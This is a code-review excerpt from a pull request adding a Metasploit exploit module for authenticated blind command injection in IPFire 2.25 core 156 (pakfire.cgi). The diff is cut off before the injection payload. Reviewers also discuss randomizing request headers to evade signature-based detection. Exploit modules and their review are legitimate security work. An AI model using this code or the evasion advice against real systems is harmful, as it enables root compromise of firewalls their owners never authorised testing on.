modules/exploits/linux/http/ipfire_pakfire_exec.rb

```diff
@@ -0,0 +1,129 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+###
+#
+# oThis explit execute arbitrary code on ipfire 2.25 core update 156
+# a bug is blind os command injection
+#
+###
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'ipfire 2.25 core 156 remote code execution',
+        'Description' => %q{This exploit execute arbitrary code on ipfire 2.25 core 156 as root.},
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Mücahit Saratar <trregen222@gmail.com>', # vulnerability research & exploit development
+          ],
+        'References' =>
+          [
+            [ 'OSVDB', '' ],
+            [ 'EDB', '49869' ], # copied from exploit-db  https://www.exploit-db.com/exploits/49869
+            [ 'URL', 'https://github.com/MucahitSaratar/ipfire-2-25-auth-rce'],
+            [ 'URL', 'https://www.youtube.com/watch?v=5FUXV7dfNjg'],
+            [ 'CVE', '']
+          ],
+        'Platform' => ['python'],
+        'Privileged' => true,
+        'Arch' => ARCH_PYTHON,
+        'Targets' =>
+          [
+            [ 'Automatic Target', {}]
+          ],
+        'DisclosureDate' => '2021-06-22',
+        'DefaultTarget' => 0
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(444),
+        OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
+        OptString.new('PASSWORD', [ true, 'Password to login with', ''])
+      ], self.class
+    )
+  end
+
+  def vpath
+    '/cgi-bin/pakfire.cgi' # vulnerable path
+  end
+
+  def send_packet(method, execstr = 'sleep 10', waitsec = 20)
+    @myheaders = {
+      'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
+      'Cache-Control' => 'max-age=0',
+      'User-Agent' => 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36',
+      'Origin' => "https://#{datastore['RHOST']}:#{datastore['RPORT']}",
+      'Sec-GPC' => '1',
+      'Sec-Fetch-Site' => 'same-origin',
+      'Upgrade-Insecure-Requests' => '1',
+      'Sec-Fetch-Mode' => 'navigate',
+      'Sec-Fetch-User' => '?1',
+      'Sec-Fetch-Dest' => 'document',
+      'Accept' => '*/*',
+      'Referer' => "https://#{datastore['RHOST']}:#{datastore['RPORT']}/",
+      'Accept-Encoding' => 'gzip, deflate',
+      'Accept-Language' => 'tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7',
+      'Connection' => 'keep-alive',
+      'Content-Type' => 'application/x-www-form-urlencoded'
```

Comment:
Most of these headers are not necessary.

Also, `Content-Type` can be set with `ctype`. It is also set automatically for POST requests.

Reply:
Not sure this was resolved, seems the `Content-Type` line was just removed and I don't see any replacement use of the `ctype` value here, which leads me to believe there may have been confusion that this comment applied just to the line `'Content-Type' => 'application/x-www-form-urlencoded'` vs the whole highlighted section.

The point @bcoles was trying to make is that requests should be minimized such that only the bare minimum needed to trigger the exploit is sent. I imagine this request could be stripped of most of these headers and the exploit would still work fine. These are the questions I currently have:

1. What headers from this list can we remove that are not necessary to trigger the exploit? We should remove these headers and leave only the ones needed to trigger the exploit itself.
2. Of these headers, is there any information we can randomize to make it harder for signature based engines to detect the malicious traffic of our exploit?
3. Can we remove the `Content-Type` header and replace it with the `ctype` parameter in another location as this is the proper way in Metasploit to set this header.

Reply:
Turns out the `Content-Type` header doesn't need to be sent for this exploit, and with https://github.com/rapid7/metasploit-framework/pull/15239/commits/203c462d9597e424a9b0761d5debdff5734e48c0 I solved point 1 by removing the extra headers, and point 2 by randomizing information where possible.